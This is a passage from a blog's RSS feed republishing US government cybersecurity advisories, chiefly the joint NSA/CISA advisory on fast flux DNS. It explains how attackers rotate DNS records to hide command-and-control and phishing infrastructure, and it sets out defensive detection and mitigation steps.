<p><a href="https://d3fend.mitre.org/technique/d3f:Application-basedProcessIsolation/" target="_blank" title="D3-ABPI ">D3-ABPI&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
<p>Enable attack surface reduction rules to prevent executable content from email.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
<p>Executable Allowlisting&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting/" target="_blank" title="D3-EAL">D3-EAL&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
<p>Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA%.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Execution Isolation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ExecutionIsolation/" target="_blank" title="D3-EI">D3-EI&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Unless users are involved in the development of scripts, limit the execution of scripts (such as batch, JavaScript, and PowerShell) to known scripts.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Application Configuration Hardening&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW12378772 BCX8">
<div class="OutlineElement Ltr SCXW12378772 BCX8">
<p>Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode. Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication. Turn off other ports/services not in use (e.g., FTP, web interface, etc.).&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p>Process Spawn Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis/" target="_blank" title="D3-PSA ">D3-PSA&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p>Use open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p>URL Reputation Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:URLReputationAnalysis/" target="_blank" title="D3-URA">D3-URA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW268068718 BCX8">
<div class="OutlineElement Ltr SCXW268068718 BCX8">
<p>Use services that provide enhanced browsing services and safe link checking.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>Network Access Mediation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkAccessMediation/" target="_blank" title="D3-NAM">D3-NAM</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>Do not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>DNS Denylisting&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSDenylisting/" target="_blank" title="D3-DNSDL ">D3-DNSDL&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>Do not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>Domain Name Reputation Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DomainNameReputationAnalysis/" target="_blank" title="D3-DNRA">D3-DNRA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW112359443 BCX8">
<div class="OutlineElement Ltr SCXW112359443 BCX8">
<p>Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>Multi-factor Authentication&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/" target="_blank" title="D3-MFA">D3-MFA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>Use MFA with strong factors and require regular re-authentication, especially for management accounts.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>Job Function Access Pattern Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis/" target="_blank" title="D3-JFAPA">D3-JFAPA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>User Account Permissions&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/" target="_blank" title="D3-UAP ">D3-UAP&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW181251528 BCX8">
<div class="OutlineElement Ltr SCXW181251528 BCX8">
<p>Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW120841028 BCX8">
<div class="OutlineElement Ltr SCXW120841028 BCX8">
<p>Token-based Authentication&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW120841028 BCX8">
<div class="OutlineElement Ltr SCXW120841028 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:Token-basedAuthentication/" target="_blank" title="D3-TBA">D3-TBA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW120841028 BCX8">
<div class="OutlineElement Ltr SCXW120841028 BCX8">
<p>Reduce reliance on passwords; instead, consider using services like single sign-on.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Credential Hardening&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Authentication Event Threshholding&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding/" target="_blank" title="D3-ANET">D3-ANET&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Use account throttling or account lockout. Throttling progressively increases time delay between successive login attempts. If using account lockout, allow between 5 to 10 attempts before lockout.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Strong Password Policy&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/" target="_blank" title="D3-SPP">D3-SPP</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW144528759 BCX8">
<div class="OutlineElement Ltr SCXW144528759 BCX8">
<p>Use a service to check for compromised passwords before using them.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p>Credential Rotation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialRotation/" target="_blank" title="D3-CRO">D3-CRO</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p>Change all default credentials.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p>Encrypted Tunnels&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="D3-ET ">D3-ET&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182803058 BCX8">
<div class="OutlineElement Ltr SCXW182803058 BCX8">
<p>Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p>Software Update&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW160303247 BCX8">
<div class="OutlineElement Ltr SCXW160303247 BCX8">
<p>Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p>Agent Authentication&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:AgentAuthentication/" target="_blank" title="D3-AA">D3-AA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p>Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p>User Behavior Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis/" target="_blank" title="D3-UBA">D3-UBA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW243011515 BCX8">
<div class="OutlineElement Ltr SCXW243011515 BCX8">
<p>Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<br />
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/russian-gru-targeting-western-logistics-entities-and-technology-companies/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fast Flux: A National Security Threat</title>
		<link>http://disensogroup.com/fast-flux-a-national-security-threat/</link>
		<comments>http://disensogroup.com/fast-flux-a-national-security-threat/#comments</comments>
		<pubDate>Tue, 01 Apr 2025 19:00:21 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/fast-flux-a-national-security-threat/</guid>
		<description><![CDATA[Executive summary Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious...]]></description>
				<content:encoded><![CDATA[<h2><strong>Executive summary</strong></h2>
<p>Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult.&nbsp;</p>
<p>The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux&nbsp;by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence.&nbsp;</p>
<p>The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity.</p>
<p>Download the PDF version of this report: <a href="https://media.defense.gov/2025/Apr/02/2003681172/-1/-1/0/CSA-FAST-FLUX.PDF">Fast Flux: A National Security Threat</a> (PDF, 841 KB).</p>
<h2><strong>Technical details</strong></h2>
<p>When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked.&nbsp;</p>
<p>Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1568/001/" target="_blank" title="Dynamic Resolution: Fast Flux DNS">T1568.001</a>].&nbsp;</p>
<h3><strong>Single and double flux</strong></h3>
<p>Malicious cyber actors use two common variants of fast flux to perform operations:</p>
<p><strong>1. </strong>Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique.</p>
<p>      Figure 1: Single flux technique.</p>
<p><strong>Note:</strong> This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers.</p>
<p><strong>2. </strong>Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique.</p>
<p>      Figure 2: Double flux technique.&nbsp;</p>
<p>Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include:</p>
<ul>
<li>Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure.&nbsp;[1]
<ul>
<li>Refer to ASD’s ACSC’s <a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">“Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure</a> for more information on BPH providers.&nbsp;[2]</li>
</ul>
</li>
<li>Fast flux has been used in Hive and Nefilim ransomware attacks.&nbsp;[3], [4]</li>
<li>Gamaredon uses fast flux to limit the effectiveness of IP blocking.&nbsp;[5], [6], [7]</li>
</ul>
<p>The key advantages of fast flux networks for malicious cyber actors include:</p>
<ul>
<li><strong>Increased resilience.</strong> As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services.</li>
<li><strong>Render IP blocking ineffective</strong>. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations.</li>
<li><strong>Anonymity</strong>. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation.</li>
</ul>
<h3><strong>Additional malicious uses</strong></h3>
<p>Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is&nbsp;used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts.&nbsp;</p>
<p>Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum&nbsp;that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel&nbsp;(See Figure 3). A customer just needs to add a &#8220;dummy server interface,&#8221; which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain &#8220;clean&#8221; and unblocked.&nbsp;</p>
<p>      Figure 3: Example dark web fast flux advertisement.</p>
<p>The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking.&nbsp;</p>
<p>As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability.</p>
<h2><strong>Detection techniques</strong></h2>
<p>The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CISA CPG 3.A</a>]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p>
<p><strong>1. </strong>Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions.</p>
<p><strong>2. </strong>Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day.</p>
<p><strong>3.</strong> Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes.</p>
<p><strong>4.</strong> Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information.</p>
<p><strong>5. </strong>Use flow data to identify large-scale communications with numerous different IP addresses over short periods.</p>
<p><strong>6.</strong> Develop&nbsp;fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior.</p>
<p><strong>7.</strong> Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts.</p>
<p><strong>8. </strong>Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity.</p>
<h2><strong>Mitigations</strong></h2>
<h3>All organizations</h3>
<p>To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics.&nbsp;</p>
<p><strong>Note:</strong> Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service&nbsp;providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content.</p>
<p><strong>1. </strong>DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses</p>
<ul>
<li>Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules.</li>
<li>Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network.</li>
<li>Block IP addresses known to be associated with malicious fast flux networks.</li>
</ul>
<p><strong>2.</strong> Reputational filtering of fast flux enabled malicious activity</p>
<ul>
<li>Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity.</li>
</ul>
<p><strong>3. </strong>Enhanced monitoring and logging</p>
<ul>
<li>Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities.</li>
<li>Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns.</li>
<li>Refer to ASD’s ACSC joint publication, <a href="https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-monitoring/best-practices-event-logging-threat-detection" target="_blank" title="Best practices for event logging and threat detection">Best practices for event logging and threat detection</a>, for further logging recommendations.</li>
</ul>
<p><strong>4. </strong>Collaborative defense and information sharing</p>
<ul>
<li>Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/automated-indicator-sharing-ais" title="Automated Indicator Sharing">Automated Indicator Sharing</a> or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s <a href="https://www.cyber.gov.au/about-us/view-all-content/news-and-media/join-the-cyber-threat-intelligence-sharing-service-through-sentinel" target="_blank" title="Cyber Threat Intelligence Sharing Platform">Cyber Threat Intelligence Sharing Platform</a> (CTIS) in Australia.</li>
<li>Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8]</li>
</ul>
<p><strong>5. </strong>Phishing awareness and training</p>
<ul>
<li>Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts.</li>
<li>Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks.</li>
<li>For more information on mitigating phishing, see joint <a href="https://www.cisa.gov/resources-tools/resources/phishing-guidance-stopping-attack-cycle-phase-one" title="Phishing Guidance: Stopping the Attack Cycle at Phase One">Phishing Guidance: Stopping the Attack Cycle at Phase One</a>.</li>
</ul>
<h3>Network defenders</h3>
<p>The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment.&nbsp;</p>
<p>However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat.&nbsp;</p>
<p>For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about <a href="https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF" target="_blank" title="Selecting a Protective DNS Service">Selecting a Protective DNS Service</a>. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s <a href="https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/DIB-Cybersecurity-Services/" target="_blank" title="DIB Cybersecurity Services">DIB Cybersecurity Services</a> and <a href="https://www.nsa.gov/Portals/75/documents/Cybersecurity/CCC/DIB_Services_NOV2023.pdf" target="_blank" title="National Security Agency Cybersecurity Services">factsheet</a>. CISA also offers a Protective DNS service for federal civilian executive&nbsp;branch (FCEB) agencies. See CISA’s <a href="https://www.cisa.gov/resources-tools/services/protective-domain-name-system-resolver" target="_blank" title="Protective Domain Name System (DNS) Resolver">Protective Domain Name System Resolver</a> page and <a href="https://www.cisa.gov/sites/default/files/2024-08/Protective%20DNS%20Fact%20Sheet%20-%20August%202024.pdf" target="_blank" title="Protective Domain Name System Resolver Service Fact Sheet">factsheet </a>for more information.&nbsp;</p>
<h2><strong>Conclusion</strong></h2>
<p>Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats.&nbsp;</p>
<p>The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization&#8217;s cyber defenses.&nbsp;</p>
<h2><strong>Works cited</strong></h2>
<p>[1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. <a href="https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service" target="_blank" title="Bulletproof Hosting: A Critical Cybercriminal Service">https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service</a>&nbsp;</p>
